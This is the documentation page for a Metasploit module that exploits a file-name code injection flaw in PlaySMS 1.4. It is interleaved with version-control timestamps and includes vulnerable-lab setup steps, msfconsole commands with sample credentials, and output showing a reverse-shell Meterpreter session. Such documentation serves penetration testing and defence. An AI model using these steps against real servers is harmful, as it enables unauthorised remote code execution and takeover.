2018-04-28 19:41:32 +05:30
## Description
2018-05-07 07:22:53 -05:00
This module exploits a code injection vulnerability within an authenticated file upload feature in PlaySMS v1.4. This issue is caused by improper file name handling in sendfromfile.php file. Authenticated Users can upload a file and rename the file with a malicious payload. Additional information and vulnerabilities can be viewed on Exploit-DB [42044 ](https://www.exploit-db.com/exploits/42003/ ).
2018-04-28 19:41:32 +05:30
2020-01-16 10:49:22 -05:00
## Verification Steps
2018-04-28 19:41:32 +05:30
Available at [Exploit-DB ](https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz )
2018-05-07 07:22:53 -05:00
### Vulnerable Application Installation Setup.
1. Download Application : `wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
2. Extract : `tar -xvf 577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz`
3. Move In WebDirectory : `mv playsms-1.4/web/* /var/www/html/`
4. make config file: `cp /var/www/html/config-dist.php /var/www/html/config.php`
5. Change Owner : `chown -R www-data:www-data /var/www/html/`
6. Set DB creds in config.php File. And dump playsms-1.4/db/playsms.sql in your playsms database.
7. Now Visit : http://localhost/
2018-04-28 19:41:32 +05:30
## Verification Steps
2018-05-07 07:22:53 -05:00
1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/playsms_filename_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `set targeturi SecreTSMSgatwayLogin`
7. Do: `set username touhid`
8. Do: `set password diana`
9. Do: `check`
2018-04-28 19:41:32 +05:30
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
2018-05-07 07:22:53 -05:00
10. Do: `set lport <port>`
11. Do: `set lhost <ip>`
12. Do: `exploit`
13. You should get a shell.
2018-04-28 19:41:32 +05:30
## Scenarios
### Playsms on Ubuntu Linux
```
msf exploit(multi/http/playsms_filename_exec) > run
[*] Started reverse TCP handler on 10.22.1.3:4444
[+] X-CSRF-Token for login : 13bce9776cfc270a3779e8b557330cc2
[*] Trying to Login ......
[+] Authentication successful : [ touhid:diana ]
[+] X-CSRF-Token for upload : 2780d48dc11a482a58d8a95ad873c6cc
[*] Trying to upload file with malicious Filename Field....
[*] Sending stage (37775 bytes) to 10.22.1.15
[*] Sleeping before handling stage...
[*] Meterpreter session 1 opened (10.22.1.3:4444 -> 10.22.1.15:38814) at 2018-04-08 13:45:34 +0530
meterpreter >
```
